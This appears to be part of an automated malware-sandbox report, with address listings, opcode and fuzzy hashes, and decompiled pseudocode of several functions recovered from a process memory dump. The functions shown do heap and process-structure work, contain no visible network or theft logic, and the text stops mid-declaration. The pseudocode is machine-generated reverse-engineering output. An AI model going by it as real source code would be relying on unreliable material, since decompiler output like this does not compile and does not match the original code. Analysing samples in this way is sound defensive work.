                                                0x015fdc75
                                                0x015fdc77
                                                0x015fdc79
                                                0x0164b551
                                                0x0164b551
                                                0x00000000
                                                0x015fdc7f
                                                0x015fdc7f
                                                0x015fdc81
                                                0x00000000
                                                0x015fdc83
                                                0x015fdc86
                                                0x015fdc88
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fdc88
                                                0x015fdc81
                                                0x015fdc79
                                                0x015fdc6c
                                                0x015fdc55
                                                0x015fdc47
                                                0x015fdc43
                                                0x00000000
                                                0x015fdc36
                                                0x015fdc23
                                                0x00000000
                                                0x015fdbff
                                                0x015fdbf1
                                                0x015fdbdf
                                                0x015fdb8f
                                                0x015fdb92
                                                0x015fdb95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fdb95
                                                0x015fdb8d
                                                0x015fdb85
                                                0x015fdb74
                                                0x015fdc9f
                                                0x015fdca2
                                                0x015fdcb0
                                                0x015fdcb0
                                                0x015fdad1
                                                0x0164b4e5
                                                0x0164b4c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fd831
                                                0x00000000
                                                0x015fd800
                                                0x0164b47f
                                                0x0164b485
                                                0x00000000
                                                0x0164b485
                                                0x015fd665
                                                0x015fd652
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad94833191a11ddf7a4cee006a7821b2f2308ce22cfe6b0fbbf8ae7f9f475676
                                                • Instruction ID: 4a2739f53eddae19ecb3dc0acb29dad387ebb96b89c392fe82379cd9718813ce
                                                • Opcode Fuzzy Hash: ad94833191a11ddf7a4cee006a7821b2f2308ce22cfe6b0fbbf8ae7f9f475676
                                                • Instruction Fuzzy Hash: C2E1BE31A0225ACFEB35DF69CC84B6EB7B2BF85304F0441ADDA099F295D734A981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F849B, Relevance: .3, Instructions: 290COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E015F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x16bf9c0);
				E0163D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x16d7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E015FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01602280( *[fs:0x30], 0x16d8550);
						_t139 =  *0x16d7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0161F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E015FFFB0(_t193, _t235, 0x16d8550);
								L5:
								return E0163D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E015E1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x16d7b9c; // 0x0
							_t235 = L01604620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x16d7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0161A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E015FFFB0(_t193, _t235, 0x16d8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L016077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L016077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x16d7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x16d7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x16d7b9c; // 0x0
									_t214 = L01604620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x16d7b10 =  *0x16d7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x16d7b04 =  *0x16d7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L016077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L016077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x16d7b08 =  *0x16d7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0162F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L016077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0161A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L016077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                0x015f849b
                                                0x015f849b
                                                0x015f849b
                                                0x015f849b
                                                0x015f849d
                                                0x015f84a2
                                                0x015f84a7
                                                0x015f84b1
                                                0x015f84d8
                                                0x00000000
                                                0x015f84b3
                                                0x015f84c4
                                                0x015f84c9
                                                0x015f84cd
                                                0x015f84cf
                                                0x015f84cf
                                                0x015f84d6
                                                0x015f84e6
                                                0x015f84e9
                                                0x015f84ec
                                                0x015f84ef
                                                0x015f84f2
                                                0x015f84f4
                                                0x015f84fc
                                                0x015f8501
                                                0x015f8506
                                                0x015f8509
                                                0x015f86e0
                                                0x015f86e5
                                                0x015f86e8
                                                0x015f86ed
                                                0x015f86f0
                                                0x015f86f2
                                                0x01649afd
                                                0x01649b02
                                                0x015f84da
                                                0x015f84df
                                                0x015f84df
                                                0x015f86fa
                                                0x015f86fd
                                                0x015f86fe
                                                0x015f8701
                                                0x015f8706
                                                0x015f8709
                                                0x015f870b
                                                0x00000000
                                                0x00000000
                                                0x015f8711
                                                0x015f8725
                                                0x015f8727
                                                0x015f872a
                                                0x015f872c
                                                0x01649af0
                                                0x01649af5
                                                0x015f8732
                                                0x015f8732
                                                0x015f8732
                                                0x015f8735
                                                0x015f8737
                                                0x015f8515
                                                0x015f8515
                                                0x015f8518
                                                0x015f851d
                                                0x015f8523
                                                0x015f8527
                                                0x015f852b
                                                0x015f8537
                                                0x015f8539
                                                0x015f853c
                                                0x015f853e
                                                0x015f868c
                                                0x015f8691
                                                0x015f8699
                                                0x015f869b
                                                0x015f8744
                                                0x015f8748
                                                0x015f86a1
                                                0x015f86a1
                                                0x015f86a1
                                                0x015f86a4
                                                0x015f86a8
                                                0x01649bdf
                                                0x01649bdf
                                                0x015f86ae
                                                0x015f86b0
                                                0x00000000
                                                0x015f86b6
                                                0x00000000
                                                0x01649be9
                                                0x015f86b0
                                                0x015f8544
                                                0x015f854a
                                                0x015f854d
                                                0x015f8551
                                                0x015f876e
                                                0x015f8778
                                                0x015f877b
                                                0x015f8780
                                                0x015f8557
                                                0x015f8557
                                                0x015f855d
                                                0x015f855d
                                                0x015f856b
                                                0x015f856e
                                                0x015f8570
                                                0x015f8573
                                                0x015f8576
                                                0x015f8576
                                                0x015f8579
                                                0x015f857b
                                                0x00000000
                                                0x00000000
                                                0x015f8581
                                                0x015f85a0
                                                0x015f85a2
                                                0x015f85a5
                                                0x015f85a7
                                                0x01649b1b
                                                0x01649b1b
                                                0x015f862e
                                                0x015f862e
                                                0x015f8631
                                                0x015f8631
                                                0x015f8634
                                                0x015f8636
                                                0x015f8669
                                                0x015f8669
                                                0x015f866b
                                                0x01649bbf
                                                0x01649bc4
                                                0x01649bc8
                                                0x01649bce
                                                0x01649bce
                                                0x015f8671
                                                0x015f8671
                                                0x015f8674
                                                0x015f8676
                                                0x01649bae
                                                0x01649bae
                                                0x015f8676
                                                0x015f867c
                                                0x015f867e
                                                0x015f8688
                                                0x015f8688
                                                0x00000000
                                                0x015f867e
                                                0x015f8638
                                                0x015f8638
                                                0x015f863b
                                                0x015f863e
                                                0x015f863f
                                                0x015f8642
                                                0x015f8645
                                                0x015f8648
                                                0x015f864d
                                                0x01649b69
                                                0x01649b6e
                                                0x01649b7b
                                                0x01649b81
                                                0x01649b85
                                                0x01649b89
                                                0x01649ba7
                                                0x01649b8b
                                                0x01649b91
                                                0x01649b9a
                                                0x01649b9f
                                                0x01649b9f
                                                0x015f8788
                                                0x015f878d
                                                0x015f8763
                                                0x015f8763
                                                0x015f8766
                                                0x00000000
                                                0x015f8766
                                                0x01649b70
                                                0x00000000
                                                0x01649b70
                                                0x015f8656
                                                0x015f865a
                                                0x015f865c
                                                0x015f8752
                                                0x015f8756
                                                0x00000000
                                                0x00000000
                                                0x015f875e
                                                0x00000000
                                                0x015f875e
                                                0x015f8662
                                                0x015f8662
                                                0x015f8662
                                                0x015f8666
                                                0x00000000
                                                0x015f8666
                                                0x015f85b7
                                                0x015f85b9
                                                0x015f85bc
                                                0x015f85bf
                                                0x015f85cc
                                                0x015f85d1
                                                0x015f85d4
                                                0x015f85db
                                                0x015f85de
                                                0x015f85e0
                                                0x01649b5f
                                                0x00000000
                                                0x01649b5f
                                                0x015f85e6
                                                0x015f85ea
                                                0x015f86c3
                                                0x015f86c5
                                                0x015f86c8
                                                0x015f86ca
                                                0x01649b16
                                                0x00000000
                                                0x01649b16
                                                0x015f86d6
                                                0x015f85f6
                                                0x015f85f6
                                                0x015f85f9
                                                0x015f8602
                                                0x015f8606
                                                0x015f860a
                                                0x015f860b
                                                0x015f860e
                                                0x015f8611
                                                0x00000000
                                                0x015f8611
                                                0x015f85f3
                                                0x00000000
                                                0x015f85f3
                                                0x015f8619
                                                0x015f861e
                                                0x015f861e
                                                0x015f8621
                                                0x015f8622
                                                0x015f8623
                                                0x015f8625
                                                0x015f862c
                                                0x00000000
                                                0x015f873d
                                                0x00000000
                                                0x015f873d
                                                0x015f8737
                                                0x015f850f
                                                0x015f8512
                                                0x00000000
                                                0x015f8512
                                                0x00000000
                                                0x015f84d6

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb0cc33bb36032384bf9eca80d3e3074ca919e15433f78fa5793598c23eae2df
                                                • Instruction ID: 0b34a811b2cb7b3df9a6612ae66f3c6fd7669b771c9d03313794b16a11015f0f
                                                • Opcode Fuzzy Hash: cb0cc33bb36032384bf9eca80d3e3074ca919e15433f78fa5793598c23eae2df
                                                • Instruction Fuzzy Hash: 80B16D70E0120ADFDB25DFD9CD84AAEBBB6BF58308F10452DE605AB345D770A945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161513A, Relevance: .3, Instructions: 258COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E0161513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16dd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0162D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01602280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01604620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0162F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E015FFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x16db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0162B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                0x01615142
                                                0x0161514c
                                                0x01615150
                                                0x01615157
                                                0x01615159
                                                0x0161515e
                                                0x01615165
                                                0x01615169
                                                0x0161516c
                                                0x01615172
                                                0x01615176
                                                0x0161517a
                                                0x0161517a
                                                0x0161517a
                                                0x0161517f
                                                0x01656d8b
                                                0x01656d8e
                                                0x01656d91
                                                0x01656d95
                                                0x01656d98
                                                0x01656d9c
                                                0x01656da0
                                                0x01656da3
                                                0x01656da7
                                                0x01656e26
                                                0x01656e26
                                                0x01656e2a
                                                0x016151f9
                                                0x016151f9
                                                0x016151fe
                                                0x01656e33
                                                0x01656e33
                                                0x01656e39
                                                0x01656e3d
                                                0x01656e46
                                                0x01656e50
                                                0x00000000
                                                0x00000000
                                                0x01656e52
                                                0x01656e53
                                                0x01656e56
                                                0x01656e5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01656e5f
                                                0x01656e67
                                                0x01656e77
                                                0x01656e7f
                                                0x01656e80
                                                0x01656e88
                                                0x01656e90
                                                0x01656e9f
                                                0x01656ea5
                                                0x01656ea9
                                                0x01656eb1
                                                0x01656ebf
                                                0x00000000
                                                0x00000000
                                                0x01656ecf
                                                0x01656ed3
                                                0x00000000
                                                0x00000000
                                                0x01656edb
                                                0x01656ede
                                                0x01656ee1
                                                0x01656ee8
                                                0x01656eeb
                                                0x01656eed
                                                0x01656ef0
                                                0x01656ef4
                                                0x01656ef8
                                                0x01656efc
                                                0x00000000
                                                0x00000000
                                                0x01656f0d
                                                0x01656f11
                                                0x01656f32
                                                0x01656f37
                                                0x01656f3b
                                                0x01656f3e
                                                0x01656f41
                                                0x01656f46
                                                0x00000000
                                                0x00000000
                                                0x01656f4c
                                                0x01656f50
                                                0x01656f50
                                                0x01656f54
                                                0x01656f62
                                                0x01656f65
                                                0x01656f6d
                                                0x01656f7b
                                                0x01656f7b
                                                0x01656f93
                                                0x01656f98
                                                0x01656fa0
                                                0x01656fa6
                                                0x01656fb3
                                                0x01656fb6
                                                0x01656fbf
                                                0x01656fc1
                                                0x01656fd5
                                                0x01656fda
                                                0x01656fda
                                                0x01656fdd
                                                0x01656fe2
                                                0x01656fe7
                                                0x01656feb
                                                0x01656fef
                                                0x01656ff3
                                                0x0161520c
                                                0x0161520c
                                                0x0161520f
                                                0x01615215
                                                0x01615234
                                                0x0161523a
                                                0x0161523a
                                                0x01615244
                                                0x01615245
                                                0x01615246
                                                0x01615251
                                                0x01615251
                                                0x01656f13
                                                0x01656f17
                                                0x01656f17
                                                0x01656f18
                                                0x01656f1b
                                                0x01656f1f
                                                0x01656f23
                                                0x00000000
                                                0x01656f28
                                                0x01615204
                                                0x01615204
                                                0x01615208
                                                0x00000000
                                                0x01615208
                                                0x01615185
                                                0x01615188
                                                0x0161518a
                                                0x0161518e
                                                0x01615195
                                                0x01656db1
                                                0x01656db5
                                                0x01656db9
                                                0x0161519b
                                                0x0161519b
                                                0x0161519e
                                                0x016151a7
                                                0x016151a9
                                                0x016151a9
                                                0x016151b5
                                                0x016151b8
                                                0x016151bb
                                                0x016151be
                                                0x016151c1
                                                0x016151c5
                                                0x016151c9
                                                0x016151cd
                                                0x016151cd
                                                0x016151d8
                                                0x016151dc
                                                0x016151e0
                                                0x01656dcc
                                                0x01656dd0
                                                0x01656dd5
                                                0x01656ddd
                                                0x01656de1
                                                0x01656de1
                                                0x01656de5
                                                0x01656deb
                                                0x01656df1
                                                0x01656df7
                                                0x01656dfd
                                                0x01656e01
                                                0x01656e05
                                                0x01656e09
                                                0x01656e0d
                                                0x01656e11
                                                0x01656e11
                                                0x016151eb
                                                0x01656e1a
                                                0x01656e1f
                                                0x01656e21
                                                0x01656e23
                                                0x00000000
                                                0x016151f1
                                                0x016151f1
                                                0x00000000
                                                0x016151f1

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11324fc5c25b7ceddd6171060131a80f7445414214a794521506d293cd358db0
                                                • Instruction ID: 9dd62828e7191a0ecc8000f6610c5de593fc07d86fba857e18e566886c8a02ba
                                                • Opcode Fuzzy Hash: 11324fc5c25b7ceddd6171060131a80f7445414214a794521506d293cd358db0
                                                • Instruction Fuzzy Hash: C7C133755093818FD355CF28C880A5AFBF1BF89304F588A6EF99A8B352D770E845CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016103E2, Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E016103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
